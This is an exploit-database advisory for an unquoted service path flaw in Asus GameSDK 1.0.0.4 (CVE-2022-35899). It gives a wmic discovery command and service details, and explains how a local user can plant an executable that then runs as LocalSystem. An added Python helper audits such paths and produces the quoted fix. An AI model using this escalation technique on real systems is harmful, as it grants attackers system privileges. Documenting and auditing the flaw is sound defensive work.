
7 changes to exploits/shellcodes Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path rpc.py 0.6.0 - Remote Code Execution (RCE) Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution Geonetwork 4.2.0 - XML External Entity (XXE) Dingtian-DT-R002 3.1.276A - Authentication Bypass Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)
30 lines
No EOL
1.3 KiB
Text
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899

# Step to discover the unquoted service path:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Info on the service:

C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : GameSDK Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem

# Exploit

If an attacker has already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\", they could place their own "GameSDK.exe" or "Program.exe" file respectively, and when the service starts, it would launch the malicious file rather than the original "GameSDK.exe".
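As an added audit helper (not part of the original advisory), the following Python parses a table in the shape the wmic one-liner above prints, flags auto-start services whose unquoted image path contains spaces, lists the binary locations Windows probes before the intended executable (the places a defender must keep non-writable by standard users), and produces the quoted ImagePath that fixes the service. The wmic sample it parses is constructed for illustration, not captured from the affected host.

```python
import re

# Constructed sample in the shape of `wmic service get name,displayname,pathname,startmode`
# output (wmic prints columns alphabetically). Not real output from the affected host.
SAMPLE_WMIC = r"""
DisplayName       Name             PathName                                                  StartMode
GameSDK Service   GameSDK Service  C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe   Auto
Quoted Service    QuotedSvc        "C:\Program Files\Vendor\Quoted Svc\svc.exe" -run         Auto
Windows Update    wuauserv         C:\Windows\system32\svchost.exe -k netsvcs                 Auto
"""

def parse_wmic(text):
    """Split wmic's space-padded table into one dict per service (columns are separated by 2+ spaces)."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    header = re.split(r"\s{2,}", lines[0])
    return [dict(zip(header, re.split(r"\s{2,}", line))) for line in lines[1:]]

def executable_part(command_line):
    """For an unquoted command line, the image path is everything up to and including the first '.exe'."""
    m = re.match(r"^(.*?\.exe)", command_line, re.IGNORECASE)
    return m.group(1) if m else command_line

def is_unquoted_with_spaces(command_line):
    """The vulnerable shape: ImagePath not wrapped in quotes and the executable path contains spaces."""
    return not command_line.startswith('"') and " " in executable_part(command_line)

def hijack_candidates(exe_path):
    """Binaries CreateProcess tries before the intended one: cut at each space and append .exe, left to right."""
    return [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]

def quoted_image_path(command_line):
    """Remediation: wrap the executable in quotes (the value to set with sc config binPath=), keeping arguments."""
    exe = executable_part(command_line)
    return '"' + exe + '"' + command_line[len(exe):]

def audit(text):
    """Return (name, binaries to keep non-writable, corrected ImagePath) for each risky auto-start service."""
    findings = []
    for svc in parse_wmic(text):
        if svc["StartMode"].lower() != "auto" or not is_unquoted_with_spaces(svc["PathName"]):
            continue
        exe = executable_part(svc["PathName"])
        findings.append((svc["Name"], hijack_candidates(exe), quoted_image_path(svc["PathName"])))
    return findings

if __name__ == "__main__":
    for name, candidates, fixed in audit(SAMPLE_WMIC):
        print(f"{name}: Windows would first try {candidates}; set binPath= {fixed}")
```

Note that the path in this advisory yields three probe locations, not two: C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\ASUS\GameSDK.exe, so the ACLs of both C:\ and the ASUS folder matter.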